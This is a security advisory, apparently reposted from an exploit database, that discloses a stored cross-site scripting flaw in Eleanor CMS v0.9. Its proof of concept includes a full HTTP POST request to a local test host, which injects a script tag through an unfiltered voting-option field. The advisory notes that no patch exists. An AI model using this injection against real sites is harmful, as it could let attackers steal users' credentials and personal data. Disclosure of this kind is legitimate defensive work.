Eleanor CMS v0.9 Stored Cross Site Scripting

2017.08.24
ir Iran Cyber Security Group (IR) ir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

============================================= ICG Laboratory - Discovered By : 0x3a - Date : August 21, 2017 - Discovered by: 0x3a - HomePage : Www.Iran-Cyber.net - Vendor HomePage : Www.eleanor-cms.ru ============================================= I. VULNERABILITY ------------------------- Eleanor CMS v0.9 - Stored Cross Site Scripting II. BACKGROUND ------------------------- Consume significantly less resources than DLE, WordPress or Joomla CNC with support for Russian text. Thoughtful multilanguage will create a site in different languages A flexible system of templates can give the will of design fantasy Completely commented source code will greatly simplify familiarity with the system III. DESCRIPTION ------------------------- Has been detected a Stored XSS vulnerability in Eleanor CMS, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. IV. PROOF OF CONCEPT ------------------------- Create A User And Login With It , In News Click On Add News , In Voting Section Add A Voting Hacker Can Execute Any HTML/script . And post: POST Eleanor/news/add HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.2.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/Eleanor/news/add Cookie: eluser=MTkwZmJjODQ4YmQwZjZmYmJjMWY3YTIwMWYyM2FhZWZ8Mg%3D%3D; el1-6=1; el1-4=1; elUploader-=599db3805df29 Connection: keep-alive Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 452 HTTP/1.1 200 OK Date: Wed, 23 Aug 2017 17:09:03 GMT Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.15 X-Powered-By: PHP/5.6.15 Cache-Control: no-store Content-Language: en Content-Encoding: gzip X-Powered-CMS: Eleanor CMS http://eleanor-cms.ru Content-Length: 3544 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=windows-1251 title=Pentest&uri=&tags=&announcement=Pentest&text=Pentest&show_detail=1&enddate=&status=1&voting%5B_addvoting%5D=1&voting%5Bbegin%5D=&voting%5Bend%5D=&voting%5Bagaindays%5D=10&voting%5B_questions%5D%5B0%5D%5Btitle%5D=Pentest&voting%5B_questions%5D%5B0%5D%5Bvariants%5D%5B0%5D=1&voting%5B_questions%5D%5B0%5D%5Bvariants%5D%5B1%5D=<script>alert("Stored XSS By 0x3a | ICG Labrotary")&voting%5B_questions%5D%5B0%5D%5Bmaxans%5D=2&back=http%3A%2F%2F127.0.0.1%2Fnews%2Fdelete%2F9&_draft=0 voting%5B_questions%5D%5B0%5D%5Bvariants%5D%5B1%5D Is Not Filtered That Make Store XSS. V. BUSINESS IMPACT ------------------------- An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc. VI. SYSTEMS AFFECTED ------------------------- Eleanor CMS v0.9 VII. SOLUTION ------------------------- No Patch Released VIII. CREDITS ------------------------- This vulnerability has been discovered and reported by ICG Laboratory IX. About Me ------------------------- 0x3a | tlg : @CloudLinux


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top